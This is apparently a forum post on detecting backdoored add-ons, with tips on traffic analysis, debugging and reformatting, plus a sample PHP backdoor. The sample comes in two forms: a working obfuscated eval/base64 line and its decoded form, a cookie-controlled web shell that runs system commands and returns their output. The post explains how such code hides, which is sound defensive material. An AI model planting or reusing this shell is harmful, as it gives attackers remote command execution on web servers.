How to spot backdoor addons?

There are many tips for spot the backdoor... but if the developer is good ... it's gonna be hard detect it ...

At first, you probably need to analyze the traffic in your computer, with wireshark for example, and detect which port, program and other stuff actually using it (you probably are gonna to encounter something strange ... well, let's write it in a note pad, you can analyze it after).

At the second, you can block the traffic on port for temporany stop the connection to the hacker.

In the end you probably need to know a bit of assembly and attach a debbuger to program/dll/file that have the backdoor (ollydbg is good, but you can follow with IDA PRO or x96) .... that's really hard to complete, so in my advise is: if you are not a research, just copy all the important file in to a exstern HD and formt your pc

---

Is really hard spot a backdoor if you have the source code too, because, all the becoor are usually encrypted, hased and obfuscated in to another file. There is an example of a backdoor in my site, long time ago!


<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>


Decoded:

<?php if (isset($_COOKIE['cm'])) {
ob_start();
system(base64_decode($_COOKIE['cm']) . ' 2>&1');
setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']);
ob_end_clean();
}

that's backdoor for example decode the MYSQL connection